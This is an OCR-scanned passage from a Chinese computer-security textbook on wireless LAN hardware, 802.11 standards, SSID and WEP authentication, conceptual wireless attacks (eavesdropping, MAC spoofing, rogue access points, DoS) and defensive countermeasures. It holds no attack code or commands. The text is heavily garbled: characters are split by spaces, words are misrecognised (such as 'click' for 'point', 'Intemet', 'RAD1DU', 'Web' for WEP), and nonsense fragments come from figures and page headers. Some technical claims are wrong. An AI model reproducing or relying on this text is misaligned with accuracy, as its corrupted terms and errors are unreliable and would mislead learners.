的 屏蔽 最 大 。 所 以 通常 实际 使 用 范围 是 : 室内 30m、 室 外 100m( 没 有 障碍 物 )。 

因此 ， 作 为 无 线 网 络 中 重要 的 环节 无 线 接 入 单 击 、 无 线 网 关 也 就 是 无 线 
AP(Access Point)， 它 的 作用 其 实 就 类 似 于 我 们 常用 的 有 线 网 络 中 的 集线器 。 在 那些 需要 大 
量 AP 来 进行 大 面积 覆盖 的 公司 使 用 得 比较 多 , 所 有 AP 通过 以 太 网 连接 起 来 并 连 到 独立 的 
无 线 局 域 网 防火 墙 。 但 同时 由 于 其 一 般 专 用 无 线 AP 都 不 带 额外 的 局 域 网 接口 ， 使 其 应 用 
范围 较 窗 。 
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2. 无 线路 由 器 


无 线路 由 器 : 就 是 带 有 无 线 覆 盖 功 能 的 路 由 器 ， 它 主要 应 用 于 用 户 上 网 和 无 线 覆 盖 。 
市 场 上 流行 的 无 线路 由 器 一 般 都 支持 专线 xdsl、cable、 动 态 xdsl 和 pptp 四 种 接 入 方式 , 它 
还 具有 其 他 一 些 网 络 管理 的 功能 ， 如 DHCP 服务 、NAT 防火 墙 、MAC 地 址 过 滤 等 功能 ， 


如 图 9-2 所 示 。 
N [| 


9-2 TP-LinkTL-WR841N 无 线路 由 器 


无 线路 由 器 (Wireless RouteD 好 比 将 单纯 性 无 线 AP 和 宽带 路 由 器 合 二 为 一 的 扩展 型 产 

品 ， 它 不 仅 具 备 单纯 性 无 线 AP 所 有 功能 如 支持 DHCP 客户 端 、 支 持 VPN、 防 火 墙 、 支 持 
WEP 加 密 等 , 而 且 还 包括 了 网 络 地 址 转换 (NAT) 功 能 , 可 支持 局 域 网 用 户 的 网 络 连接 共享 。 
可 实现 家 庭 无 线 网 络 中 的 Intemet 连接 共享 ， 实 现 ADSL 和 小 区 宽带 的 无 线 共享 接 入 。 
无 线路 由 器 可 以 与 所 有 以 太 网 接 的 ADSL MODEM 或 CABLE MODEM 直接 相连 ， 也 
可 以 在 使 用 时 通过 交换 机 、 宽 带路 由 器 等 局 域 网 方式 再 接 入 。 其 内 置 有 简单 的 虚拟 拨号 软 
件 ， 可 以 存储 用 户 名 和 密码 拨号 上 网 ， 可 以 实现 为 拨号 接 入 Intemet 的 ADSL、CM 等 提供 
自动 拨号 功能 ， 而 无 须 手 动 拨号 或 占用 一 台 计算 机 做 服务 器 使 用 。 无 线路 由 器 一 般 还 具备 
相对 更 完善 的 安全 防护 功能 。 

此 外 ， 大 多 数 无 线路 由 器 还 包括 一 个 4 个 端口 的 交换 机 ， 可 以 连接 n 台 使 用 有 线 网 卡 
的 计算 机 ， 从 而 实现 有 线 和 无 线 网 络 的 顺利 过 渡 。 

在 接 入 速度 上 ， 目 前 符合 54Mb/s、108Mb/s、300Mb/s 的 无 线路 由 器 产品 缘 有 。 

无 线路 由 器 适合 于 ADSL、CM 猫 等 设备 。 无 线路 由 器 将 多 种 设备 合 而 为 一 ， 亦 比较 
适合 于 初次 建 网 的 用 户 ， 其 集成 化 的 功能 可 以 使 用 户 只 用 一 个 设备 而 满足 所 有 的 有 线 和 无 
线 网 络 需求 。 

3. 无 线 网 卡 

无 线 网 卡 是 终端 无 线 网 络 的 设备 ， 是 无 线 局 域 网 的 无 线 覆盖 下 通过 无 线 连接 网 络 进行 
上 网 使 用 的 无 线 终端 设备 。 有 具体 来 说 无 线 网 卡 就 是 使 你 的 计算 机 可 以 利用 无 线 来 上 网 的 一 
个 装置 ， 但 是 有 了 无 线 网 卡 也 还 需要 一 个 可 以 连接 的 无 线 网 络 ， 如 果 你 在 家 里 或 者 所 在 地 
有 无 线路 由 器 或 者 无 线 AP 的 覆盖 ， 就 可 以 通过 无 线 网 卡 以 无 线 的 方式 连接 无 线 网 络 可 上 网 。 

1) 无 线 网 卡 标准 上 区 分 

无 线 网 卡 按 无 线 标准 可 定 为 IEEE 802.11b、IEEE 802.11a、IEEE 802.1lg 和 IEEE 
802.11n。 

在 频段 上 来 说 802.11a 标准 为 5.8GHz 频段 ，802.11b、802.11g 标准 为 2.4GHz 频段 。 
从 传输 速率 上 来 说 802.11b 使 用 了 DSSS( 直 接 序 列 扩 频 ) 或 CCK( 补 码 键 控 调 制 )， 传 输 速率 
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为 11Mb/s， 而 下 EE802.11g 和 下 EE802.11a 使 用 相同 的 OFDM( 正 交 频 分 复 用 调制 ) 技 术 ， 
使 其 传输 速率 是 b 的 5 倍 ， 也 就 是 54Mb/s。 

兼容 上 来 说 下 EE802.11a 不 兼容 下 EE802.11b， 但 是 可 以 兼容 IEEE802.11g， 而 
IEEE802.11g 和 IEEE802.11b 两 种 标准 可 以 相互 兼容 使 用 ， 但 在 使 用 时 仍 需 注意 ， 
IEEE802.11g 的 设备 在 IEEE802.11b 的 网 络 环境 下 使 用 只 能 使 用 人 下 EE802.11b 标准 , 其 数据 
数 率 只 能 达到 11Mb/s。IEEE802.11n 与 以 往 的 IEEE802.11 a/b/g 等 标准 相 比 , 性 能 有 了 很 大 
幅度 的 提高 , 网 络 传输 速度 最 高 可 达 600 Mbit/s, 这 让 无 线 局 域 网 一 跃进 入 了 高 速 网 络 的 行 
列 ， 智 能 天 线 技术 也 使 无 线 局 域 网 的 覆盖 范围 延伸 至 几 平方 公里 ， 更 重要 的 是 ， 
IEEE802.11n 使 无 线 局 域 网 获得 了 更 大 的 环境 适应 能 

2) 无 线 网 卡 接口 上 区 分 

无 线 网 卡 按照 接口 的 不 同 可 以 分 为 多 种 。 

一 种 是 台式 机 专用 的 PCI 接口 无 线 网 卡 ， 如 图 9-3 所 示 。 


图 9-3 台式 机 专用 的 PCI 接口 无 线 网 卡 


一 种 是 笔记 本 电脑 专用 的 PCMICA 接口 网 卡 ， 如 图 9-4 所 示 。 

一 种 是 USB 无 线 网 卡 ， 这 种 网 卡 不 管 是 台式 机 用 户 还 是 笔记 本 用 户 ， 只 要 安装 了 驱动 
程序 ， 都 可 以 使 用 。 在 选择 时 只 需要 单 击 就 可 以 ， 只 有 采用 USB2.0 接口 的 无 线 网 卡 才能 
满足 IEEE802.11g 或 IEEE 802.11g+ 的 需求 ， 如 图 9-5 所 示 。 


图 9-4 笔记 本 电脑 专用 的 PCMICA 接口 网 卡 图 9-5 USB 无 线 网 卡 
3) 无 线 网 卡 网 络 制式 上 区 分 
无 线 上 网 卡 是 目前 无 线 广 域 通信 网 络 应 用 广泛 的 上 网 介质 。 目 前 ， 由 于 我 国 只 有 中 国 
移动 的 GPRS 和 中 国联 通 的 CDMA (1X) 两 种 网 络 制式 ， 所 以 常见 的 无 线 上 网 卡 就 包括 
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CDMA 无 线 上 网 卡 和 GPRS 无 线 上 网 卡 两 类 。 另 外 还 有 一 种 CDPD 无 线 上 网 卡 。 

(1) CDMA 无 线 上 网 卡 。 

CDMA(Code Division Multiple Access, 码 分 多 址 ) 无 线 上 网 卡 是 针对 中 国联 通 的 CDMA 
网 络 推 出 来 的 上 网 连接 设备 。CDMA 人 允许 所 有 的 使 用 者 同时 使 用 全 部 频带 ， 并 且 把 其 他 使 
用 者 发 出 的 信号 视 为 杂音 ， 完 全 不 必 考 虑 到 信号 碰撞 (collision) 的 问题 。 

(2) GPRS 无 线 上 网 卡 。 

GPRS 上 网 卡 是 针对 中 国 移动 的 GPRS 网 络 推出 来 的 无 线 上 网 设备 。 GPRS 的 英文 全 称 
为 “General Packet Radio Service”， 中 文 含义 为 “通用 分 组 无 线 服 务 ”， 它 是 利用 “ 包 交 
换 ”(Packet-Switched) 的 概念 所 发 展 出 的 一 套 无 线 传输 方式 。 所 谓 的 包 交 换 就 是 将 Date 封 
装 成 许多 独立 的 封包 ， 再 将 这 些 封包 一 个 一 个 传送 出 去 ， 形 式 上 有 单 击 类 似 寄 包 庄 ， 采 用 
包 交 换 的 好 处 是 只 有 在 有 资料 需要 传送 时 才 会 占用 频 宽 ， 而 且 可 以 以 传输 的 资料 量 计价 ， 
这 对 用 户 来 说 是 比较 合理 的 计 费 方式 , 因为 像 Internet 这 类 的 数据 传输 大 多 数 的 时 间 频 宽 是 
闲置 的 。 

相对 原来 GSM 的 拨号 方式 的 电路 交换 数据 传送 方式 , GPRS 是 分 组 交换 技术 , 具有 “ 实 
时 在 线 ”、“ 按 量 计 费 ”、“ 快 捷 登 录 ”、“ 高 速 传输 ”、“ 自 如 切换 ”的 优点 。 


9.2 无 线 网 络 的 安全 问题 


目前 , 无 线 局 域 网 已 与 有 线 局 域 网 紧密 地 结合 在 一 起 , 并 且 已 经 成 为 市 场 的 主流 产品 。 
在 无 线 局 域 网 上 ， 数 据 传输 是 通过 无 线 电波 在 空中 广播 的 ， 因 此 在 发 射 机 覆盖 范围 内 数据 
可 以 被 任何 无 线 局 域 网 终端 接收 。 安 装 一 套 无 线 局 域 网 就 好 像 在 任何 地 方 都 放置 了 以 太 网 
接口 。 无 线 局 域 网 的 用 户主 要 关心 的 是 网 络 的 安全 性 ， 它 主要 包括 接 入 控制 和 加 密 两 个 
方面 。 


9.2.1 无 线 网 络 标准 的 安全 性 


802.11 是 IEEE 制定 的 第 一 个 无 线 局 域 网 标准 ， 主 要 用 于 解决 办 公 室 局 域 网 和 校园 网 
中 用 户 与 用 户 终端 的 无 线 接 入 ， 业 务 主要 限于 数据 访问 ， 速 率 最 高 只 能 达到 2Mbps。 由 于 
它 在 速率 和 传输 距离 上 都 不 能 满足 人 们 的 需要 ， 因 此 ，IEEE 小 组 又 相继 推出 了 802.11b 和 
802.11a 两 个 标准 。 

IEEE 802.11b 标准 定义 了 两 种 方法 实现 无 线 局 域 网 的 接 入 控制 和 加 密 : 系统 ID(SSID) 
和 有 线 对 等 加 密 (WEP)。 

1. 认证 

当 一 个 站 点 与 另 一 个 站 点 建立 网 络 连接 之 前 ， 必 须 首先 通过 认证 。 执 行 认证 的 站 点 发 
送 一 个 管理 认证 帧 到 一 个 相应 的 站 点 。IEEE 802.11b 标准 详细 定义 了 两 种 认证 服务 : 开放 
系统 认证 (Open System Authentication): 是 802.11b 默认 的 认证 方式 。 这 种 认证 方式 非常 简 
单 ， 分 为 两 步 : 首先 ， 向 认证 另 一 站 点 的 站 点 发 送 一 个 含有 发 送 站 点 身份 的 认证 管理 帧 ; 
然后 ， 接 收 站 发 回 一 个 提醒 它 是 否 识别 认证 站 点 身份 的 帧 。 共 享 密 钥 认 证 (Shared Key 
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Anuthentication): 这 种 认证 先 假定 每 个 站 点 通过 一 个 独立 于 IEEE 802.11 网 络 的 安全 信道 ， 
已 经 接收 到 一 个 秘密 共享 密 钥 ， 然 后 这 些 站 点 通过 共享 密 钥 的 加 密 认证 ， 加 密 算法 是 有 线 
等 价 加 密 (WEP)。 共 享 密 钥 认证 的 过 程 描述 如 下 。 

(1) 请 求 工作 站 向 另 一 个 工作 站 发 送 认证 帧 。 

(2) 当 一 个 站 收 到 开始 认证 帧 后 ， 返 回 一 个 认证 帧 ， 该 认证 帧 包含 WEP 服务 生成 的 
128 字 节 的 质询 文本 。 

(3) 请 求 工作 站 将 质询 文本 复制 到 一 个 认证 帧 中 ， 用 共享 密 钥 加 密 ， 然 后 再 把 帧 发 往 
相应 工作 站 。 

(4) 接收 站 利用 相同 的 密 钥 对 质询 文本 进行 解密 ， 将 其 和 早先 发 送 的 质询 文本 进行 比 
较 。 如 果 相 互 匹 配 ， 相 应 工作 站 返回 一 个 表示 认证 成 功 的 认证 帧 ， 如 果 不 匹配 ， 则 返回 失 
败 认 证 帧 ， 如 图 9-6 所 示 。 


请 求 工作 站 响应 工作 站 


有 词 双 下 加 本 
驻 证 算法 标识 = “共享 密 调 ” 
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图 9-6 共享 密 钥 认 证 


认证 使 用 的 标识 码 称 为 服务 组 标识 符 (SSID: Service Set Identifier)， 它 提供 一 个 最 底层 
的 接 入 控制 。 一 个 SSID 是 一 个 无 线 局 域 网 子 系统 内 通用 的 网 络 名 称 ， 它 服务 于 该 子 系统 
内 的 逻辑 段 。 因 为 SSID 本 身 没有 安全 性 ， 所 以 用 SSID 作为 接 入 控制 是 不 够 安全 的 。 接 入 
单 击 作为 无 线 局 域 网 用 户 的 连接 设备 ， 通 常 广播 SSID。 


2. WEP 


IEEE 802.11b 规定 了 一 个 可 选择 的 加 密 称 为 有 线 对 等 加 密 , 即 WEP。WEP 提供 一 种 无 
线 局 域 网 数据 流 的 安全 方法 。WEP 是 一 种 对 称 加 密 ， 加 密 和 解密 的 密 钥 及 算法 相同 。 

WEP 的 目标 如 下 。 

(1) 接 入 控制 防止 未 授权 用 户 接 入 网 络 ， 它 们 没有 正确 的 WEP 密 钥 。 

(2) 加 密 : 通过 加 密 和 只 允许 有 正确 WEP 密 钥 的 用 户 解密 来 保护 数据 流 。 

IEEE 802.11b 标准 提供 了 两 种 用 于 无 线 局 域 网 的 WEP 加 密 方案 。 

第 一 种 方案 可 提供 四 个 默认 密 钥 以 供 所 有 的 终端 共享 一 一 包括 一 个 子 系统 内 的 所 有 接 
入 单 击 和 客户 适配器 。 当 用 户 得 到 默认 密 钥 以 后 , 就 可 以 与 子 系统 内 所 有 用 户 安全 地 通信 。 
默认 密 钥 存在 的 问题 是 当 它 被 广泛 分 配 时 可 能 会 危及 安全 。 

第 二 种 方案 中 是 在 每 一 个 客户 适配器 建立 一 个 与 其 他 用 户 联系 的 密 钥 表 。 该 方案 比 第 
一 种 方案 更 加 安全 ， 但 随 着 终端 数量 的 增加 给 每 一 个 终端 分 配 密 钥 很 困难 。 


2 


(CO》 > 计算 机 网 络 安全 (第 ?版 ) 


一 堂 沙 苦 秩 手 ”十 水 从 诊 FHMt 台 沼 也 


@ -一 


9.2.2 无 线 网 络 安全 性 的 影响 因素 


1. 硬件 设备 


在 现 有 的 WLAN 产品 中 , 常用 的 加 密 方 法 是 给 用 户 静态 分 配 一 个 密 钥 , 该 密 钥 或 者 存 
储 在 磁盘 上 或 者 存储 在 无 线 局 域 网 客户 适配器 的 存储 器 上 。 这 样 ， 拥 有 客户 适配器 就 有 了 
MAC 地 址 和 WEP 密 钥 并 可 用 它 接 入 到 接 入 点 。 如 果 多 个 用 户 共享 一 个 客户 适配器 ， 这 些 
用 户 有 效 地 共享 MAC 地 址 和 WEP 密 钥 。 

当 一 个 客户 适配器 丢失 或 被 窃 的 时 候 , 合法 用 户 没 有 MAC 地 址 和 WEP 密 钥 不 能 接 入 ， 
但 非法 用 户 可 以 。 网 络 管理 系统 不 可 能 检测 到 这 种 问题 ， 因 此 用 户 必须 立即 通知 网 络 管理 
员 。 接 到 通知 后 ， 网 络 管理 员 必须 改变 接 入 到 MAC 地 址 的 安全 表 和 WEP 密 钥 ， 并 给 予 丢 
失 或 被 窃 的 客户 适配器 使 用 相同 密 钥 的 客户 适配器 重新 编码 静态 加 密 密 钥 。 客 户 端 越 多 ， 
重新 编码 WEP 密 钥 的 数量 就 越 大 。 


2. 虚假 接 入 单 击 


IEEE802.11b 共享 密 钥 认证 表 采 用 单 向 认证 ， 而 不 是 互相 认证 。 接 入 点 鉴别 用 户 ， 但 
用 户 不 能 鉴别 接 入 点 。 如 果 一 个 虚假 接 入 点 放 在 无 线 局 域 网 内 ， 它 可 以 通过 劫持 合法 用 户 
的 客户 适配器 进行 拒绝 服务 或 攻击 。 

因此 在 用 户 和 认证 服务 器 之 间 进 行 相互 认证 是 需要 的 ， 每 一 方 在 合理 的 时 间 内 证 明 自 
己 是 合法 的 。 因 为 用 户 和 认证 服务 器 是 通过 接 入 点 进行 通信 的 , 接 入 点 必须 支持 相互 认证 。 
相互 认证 使 检测 和 隔离 虚假 接 入 点 成 为 可 能 。 

3. 其 他 安全 问题 


标准 WEP 支持 对 每 一 组 加 密 , 但 不 支持 对 每 一 组 认证 。 从 响应 和 传送 的 数据 包 中 一 个 
黑客 可 以 重建 一 个 数据 流 ， 组 成 欺骗 性 数据 包 。 减轻 这 种 安全 威胁 的 方法 是 经 常 更 换 WEP 
密 钥 。 

通过 监测 IEEE802.11b 控制 信道 和 数据 信道 ， 黑 客 可 以 得 到 如 下 信息 。 

(1) 客户 端 和 接 入 点 MAC 地 址 。 

(2) 内 部 主机 MAC 地 址 。 

(3) 上 网 时 间 。 

黑客 可 以 利用 这 些 信 息 研究 提供 给 用 户 或 设备 的 详细 资料 。 为 减少 这 种 黑客 活动 ， 一 
个 终端 应 该 使 用 每 一 个 时 期 的 WEP 密 铀 ， 如 图 9-7 所 示 。 


RAD1DU 服 务 器 和 站 点 双向 
认证 并 且 生 成 WEP 密 钥 


站 点 和 AP 激 活 WEP， RAD1DU 服 务 器 
加 密 传输 数据 把 密 钥 传 给 AP 


9-7 ”认证 的 全 部 过 程 


由 务 9 萌 无 绪 克 络 安全 


9.2.3 ”无 线 网 络 常见 的 攻击 


无 线 网 络 可 能 受到 的 攻击 分 为 两 类 : 一 类 是 关于 网 络 访问 控制 、 数 据 机 密 性 保护 和 数 
据 完整 性 保护 进行 的 攻击 ， 这 类 攻击 在 有 线 环境 下 也 会 发 生 ， 另 一 类 则 是 由 无 线 介 质 本 身 
的 特性 决定 的 ， 基 于 无 线 通信 网 络 设计 、 部 署 和 维护 的 独特 方式 而 进行 的 攻击 。 


1. WEP 中 存在 的 弱点 


IEEE(Institute of Electrical and Electronics Engineers， 电 气 与 电子 工程 师 学 会 ) 制 定 的 
802.11 标准 最 早 是 在 1999 年 发 布 的 ， 它 描述 了 WLAN(Wireless Local Area Network， 无 线 
局 域 网 ) 和 WMAN(Wireless Metropolitan Area Network, 无 线 城 域 网 ) 的 MAC(Medium Access 
Control， 介 质 访问 控制 ) 和 物理 层 的 规范 。 为 了 防止 出 现 无 线 网 络 用 户 偶然 窃听 的 情况 ， 和 
提供 与 有 线 网 络 中 功能 等 效 的 安全 措施 ，IEEE 引入 了 WEP (Wired Equivalent Privacy， 有 
线 等 价 保密 ) 算 法 。 和 许多 新 技术 一 样 ， 最 初 设计 的 WEP 被 人 们 发 现 了 许多 严重 的 弱点 。 
专家 们 利用 已 经 发 现 的 弱点 ， 攻 破 了 WEP 声称 具有 的 所 有 安全 控制 功能 。 总 的 来 说 ，WEP 
存在 如 下 弱点 。 

(1) 整体 设计 : 在 无 线 环境 中 ,不 使 用 保密 措施 是 具有 很 大 风险 的 ,但 WEP 协议 只 是 
802.11 设备 实现 的 一 个 可 选项 。 

(2) 加 密 算法 : WEP 中 的 IV(Initialization Vector， 初 始 化 向 量 ) 由 于 位 数 太 短 和 初始 化 
复位 设计 ， 容 易 出 现 重用 现象 ， 从 而 被 人 破解 密 钥 。 而 对 用 于 进行 流 加 密 的 RC4 算法 ， 在 
其 头 256 个 字 节 数据 中 的 密 钥 存在 弱 单 击 , 目前 还 没有 任何 一 种 实现 方案 修正 了 这 个 缺陷 。 
此 外 用 于 对 明文 进行 完整 性 校 验 的 CRC(Cyclic Redundancv Check, 循环 元 余 校 验 ) 只 能 确保 
数据 正确 传输 ， 并 不 能 保证 其 未 被 修改 ， 因 而 并 不 是 安全 的 校 验 码 。 

(3) 密 钥 管理 : IEEE 802.11 标准 指出 ，WEP 使 用 的 密 钥 需 要 接受 一 个 外 部 密 钥 管理 
系统 的 控制 。 通过 外 部 控制 ， 可 以 减少 IV 的 冲突 数量 ,使 得 无 线 网 络 难以 攻破 。 但 问题 在 
于 这 个 过 程 形式 非常 复杂 ， 并 且 需 要 手工 操作 。 因 而 很 多 网 络 的 部 署 者 更 倾向 于 使 用 默认 
的 WEP 密 钥 , 这 使 黑客 为 破解 密 钥 所 做 的 工作 量 大 大 减少 了 。 另 一 些 高 级 的 解决 方案 需要 
使 用 额外 资源 ， 如 RADIUS 和 Cisco 的 LEAP， 其 花费 是 很 昂贵 的 。 

(4) 用 户 行为 : 许多 用 户 都 不 会 改变 默认 的 配置 选项 ， 这 令 黑客 很 容易 推断 出 或 猜 出 

2. 执行 搜索 

NetStumbler 是 第 一 个 被 广泛 用 来 发 现 无 线 网 络 的 软件 。 据 统计 ， 有 超过 50% 的 无 线 
网 络 是 不 使 用 加 密 功能 的 。 通 常 即 使 加 密 功 能 处 于 活动 状态 ，WAP(Wireless Access Point， 
无 线 接 入 点 ) 广 播 信息 中 仍然 包括 许多 可 以 用 来 推断 出 WEP 密 钥 的 明文 信息 , 如 网 络 名 称 、 
SSID(Secure Set Identife， 安 全 集 标识 符 ) 等 。 


3. 窃听 、 截 取 和 监听 
窃听 是 指 偷 听 流 经 网 络 的 计算 机 通信 的 电子 形式 。 它 是 以 被 动 和 无 法 觉察 的 方式 入 侵 
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检测 设备 的 。 即 使 网 络 不 对 外 广播 网 络 信息 ， 只 要 能 够 发 现任 何 明文 信息 ， 攻 击 者 仍然 可 
以 使 用 一 些 网 络 工具 ， 如 Eth real 和 TCPDump 来 监听 和 分 析 通 信 量 ， 从 而 识别 出 可 以 破 
坏 的 信息 。 使 用 虚拟 专用 网 、SSL(Secure Sockets Lave， 安 全 套 接 字 层 ) 和 SSH(Secure Shell) 
有 助 于 防止 无 线 拦截 。 


4. 欺骗 和 非 授 权 访问 


由 于 TCP/IP 协议 的 设计 原因 ， 几 乎 无 法 防止 MAC/IP 地 址 欺骗 。 只 有 通过 静态 定义 
MAC 地 址 表 才 能 防止 这 种 类 型 的 攻击 . 但 是 , 因为 巨大 的 管理 负担 , 这 种 方案 很 少 被 采用 。 
只 有 通过 智能 事件 记录 和 监控 日 志 才 可 以 对 付 已 经 出 现 过 的 欺骗 。 当 试图 连接 到 网 络 上 的 
时 候 ， 简 单 地 通过 让 另外 一 个 节点 重新 向 AP 提交 身份 验证 请 求 ， 就 可 以 很 容易 地 欺骗 无 
线 网 身份 验证 。 许 多 无 线 设备 提供 商 允 许 终端 用 户 通过 使 用 设备 附带 的 配置 工具 ， 重 新 定 
义 网 卡 的 MAC 地 址 。 使 用 外 部 双 因子 身份 验证 ， 如 RADIUS 或 SecurID， 可 以 防止 非 授 
权 用 户 访问 无 线 网 及 其 连接 的 资源 ， 并 且 在 实现 的 时 候 ， 应 该 对 需要 经 过 强 验证 才能 访问 
资源 的 访问 进行 严格 的 限制 。 

5. 网 络 接管 与 篡改 

同样 由 于 TCP/IP 协议 设计 的 原因 , 某 些 技术 可 供 攻击 者 接管 与 其 他 资源 建立 的 网 络 连 
接 。 如 果 攻 击 者 接管 了 某 个 AP， 那 么 所 有 来 自 无 线 网 的 通信 量 都 会 传 到 攻击 者 的 机 器 上 ， 
包括 其 他 用 户 试图 访问 合法 网 络 主机 时 需要 使 用 的 密码 和 其 他 信息 。 欺 诈 AP 可 以 让 攻击 
者 从 有 线 网 或 无 线 网 进行 远程 访问 ， 而 且 这 种 攻击 通常 不 会 引起 用 户 的 重视 ， 用 户 通常 是 
在 毫 无 防范 的 情况 下 输入 自己 的 身份 验证 信息 ， 甚 至 在 接 到 许多 SSL 错误 或 其 他 密 钥 错误 
的 通知 之 后 , 仍 像 是 看 待 自己 机 器 上 的 错误 一 样 看 待 它们 , 这 让 攻击 者 可 以 继续 接管 连接 ， 
而 不 必 担 心 被 别人 发 现 。 

6. 拒绝 服务 攻击 


无 线 信号 传输 的 特性 和 专门 使 用 扩 频 技术 ， 使 得 无 线 网 络 特别 容易 受到 DoS(Denial of 
Service, 拒绝 服务 ) 攻 击 的 威胁 。 拒绝 服务 是 指 攻击 者 恶意 占用 主机 或 网 络 几乎 所 有 的 资源 ， 
使 得 合法 用 户 无 法 获得 这 些 资源 。 要 造成 这 类 的 攻击 ， 最 简单 的 办 法 是 通过 让 不 同 的 设备 
使 用 相同 的 频率 ， 从 而 造成 无 线 频谱 内 出 现 冲突 。 另 一 个 可 能 的 攻击 手段 是 发 送 大 量 非法 
(或 合法 ) 的 身份 验证 请 求 。 第 三 种 手段 ， 如 果 攻 击 者 接管 AP， 并且 不 把 通信 量 传递 到 恰当 
的 目的 地 ， 那 么 所 有 的 网 络 用 户 都 将 无 法 使 用 网 络 。 为 了 防止 Dos 攻击 ， 可 以 做 的 事情 很 
少 。 无 线 攻击 者 可 以 利用 高 性 能 的 方向 性 天 线 ， 从 很 远 的 地 方 攻击 无 线 网 。 已 经 获得 有 线 
网 访问 权 的 攻击 者 ， 可 以 通过 发 送 无 线 AP 无 法 处 理 的 通信 量 来 攻击 它 。 此 外 ， 为 了 获得 
与 用 户 的 网 络 配置 发 生 冲突 的 网 络 ， 只 要 利用 Netstumbler 就 可 以 做 到 。 

7. 恶意 软件 


凭借 技巧 定制 的 应 用 程序 ， 攻 击 者 可 以 直接 到 终端 用 户 上 查找 访问 信息 ， 例 如 访问 用 
户 系统 的 注册 表 或 其 他 存储 位 置 ,以 便 获取 WEP 密 钥 并 把 它 发 送 回 到 攻击 者 的 机 器 上 。 注 
意 让 软件 保持 更 新 ， 并 且 遏 制 攻击 的 可 能 来 源 (Web 浏览 器 、 电 子 邮 件 、 运 行 不 当 的 服务 器 


由 务 9 萌 无 绪 网 终 安 全 


服务 等 )， 这 是 唯一 可 以 获得 的 保护 措施 。 

8. 偷窃 用 户 设备 

只 要 得 到 了 一 块 无 线 网 网 卡 ， 攻 击 者 就 可 以 拥有 一 个 无 线 网 使 用 的 合法 MAC 地 址 。 
也 就 是 说 ， 如 果 终 端 用 户 的 笔记 本 电脑 被 盗 ， 他 丢失 的 不 仅仅 是 电脑 本 身 ， 还 包括 设备 上 
的 身份 验证 信息 ， 如 网 络 的 SSID 及 密 钥 。 而 对 于 别有用心 的 攻击 者 而 言 ， 这 些 往往 比 电 
脑 本 身 更 有 价值 。 


9.2.4 ”无 线 网 络 安全 对 策 


1. 分 析 威 胁 
分 析 威 胁 是 保护 网 络 的 第 一 步 。 应 当 确 定 潜在 入 侵 者 ， 并 纳入 规划 网 络 的 计划 。 
2. 设计 和 部 署 安全 网 络 


改变 默认 设置 。 把 基站 看 作 RAS(Remote Access Server， 远 程 访问 服务 器 )， 指 定 专用 
于 WLAN 的 人 P 协议 。 在 AP 上 使 用 速度 最 快 的 、 能 够 支持 的 安全 功能 。 考 虑 天 线 对 授权 
用 户 和 入 侵 者 的 影响 。 在 网 络 上 ， 针 对 全 部 用 户 使 用 一 致 的 授权 规则 。 在 不 会 被 轻易 损坏 
的 位 置 部 署 硬件 。 

3. 实现 WEP 


WEP 单独 使 用 ， 并 不 能 提供 足够 的 WLAN 安全 性 。 但 通过 在 每 帧 中 混入 一 个 校 验 和 
的 做 法 ，WEP 能 够 防止 一 些 初步 的 攻击 手段 ， 即 向 流 中 插入 已 知 文本 来 破解 密 钥 流 ， 必 须 
在 每 个 客户 端 和 每 个 AP 上 实现 WEP 才能 起 作用 。 不 必 一 定 使 用 预先 定义 的 WEP 密 钥 ， 
可 以 由 用 户 来 定义 密 钥 ， 而 且 能 够 经 常 修改 。 要 使 用 最 坚固 的 WEP 版 本 ， 并 与 标准 的 最 新 
更 新 版 本 保持 同步 。 

4. 过 滤 MAC 

把 MAC 过 滤器 作为 第 一 层 保护 措施 。 应 该 记录 WLAN 上 使 用 的 每 个 MAC 地 址 ， 并 
配置 在 AP 上 ， 只 允许 这 些 地 址 访问 网 络 。 使 用 日 志 记录 产生 的 错误 ， 并 定期 检查 ， 以 判 
断 是 否 某 些 人 企图 突破 安全 措施 。 

5. 过 滤 协 议 

过 滤 协议 是 个 相当 有 效 的 方法 ， 能 够 限制 那些 企图 通过 SNMP(Simple Network 
Management Protocol， 简 单 网 络 管理 协议 ) 访 问 无 线 设备 来 修改 配置 的 WLAN 用 户 ， 还 可 
以 防止 使 用 较 大 的 ICMP(Internet Control Message Protocol， 网 际 控制 报 文 协议 ) 包 和 其 他 会 
用 作 Dos 的 协议 。 过 滤 全 部 适合 的 协议 和 地 址 ， 维 持 对 穿越 自己 网 络 的 数据 的 控制 。 


6. 使 用 封闭 系统 和 网 络 


尽管 可 以 很 轻易 地 捕获 RF(Radio Frequency， 无 线 频率 ) 通 信 ， 但 是 通过 防止 SSID 从 
AP 向 外 界 广播 ， 就 可 以 克服 这 个 缺点 。 封 闭 整个 网 络 ， 避 免 随时 可 能 发 生 的 无 效 连接 ， 把 
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必要 的 客户 端 配置 信息 安全 地 分 发 给 WLAN 用 户 。 
7. 分 配 IP 


判断 使 用 哪 一 个 分 配 IP 的 方法 最 适合 自己 的 机 构 : 静态 还 是 动态 指定 地 址 。 静 态 地 址 
可 以 避免 黑客 自动 获得 卫 地 址 ， 而 动态 地 址 可 以 简化 WLAN 的 使 用 ， 可 以 降低 那些 繁重 
的 管理 工作 。 静 态 卫 范围 使 黑客 不 得 不 猜测 WLAN 中 的 子 网 。 

8. 使 用 VPN 


在 合适 的 位 置 使 用 VPN(Virtual Private Network, 虚拟 专用 网 ) 服 务 。 这 是 最 安全 的 远程 
访问 方法 。 一 些 AP( 例 如 Colubris 和 Nokia) 为 了 执行 的 方便 ， 已 经 内 置 了 VPN。 

在 信息 领域 ， 没 有 绝对 安全 的 措施 。 可 以 肯定 的 是 ， 无 线 信息 产品 的 大 规模 普及 ， 依 
赖 于 安全 标准 的 进一步 完善 。 


9.3 无线 网 络 的 WEP 机 制 


Web 安全 技术 源 自 于 名 为 RC4 的 RSA 数据 加 密 技 术 ， 用 来 满足 用 户 更 高 层次 的 网 络 
安全 需求 。 随 着 无 线 网 络 的 逐渐 流行 及 对 安全 要 求 的 进一步 提高 , 使 用 WEP 加 密 的 缺陷 也 
逐渐 暴露 。 


9.3.1 WEP 机 制 简介 


1. 什么 是 WEP 


WEP(Wired Equivalent Privacy) 无 线 等 效 保密 协议 是 由 IEEE 802.11 标准 定义 的 ， 是 最 
基本 的 无 线 安全 加 密 措施 ， 用 于 在 无 线 局 域 网 中 保护 链 路 层 数 据 ， 其 主要 用 途 如 下 。 

(1) 提供 接 入 控制 ， 防 止 未 授权 用 户 访问 网 络 。 

(2) WEP 加 密 算法 对 数据 进行 加 密 ， 防 止 数据 被 攻击 者 窃听 。 

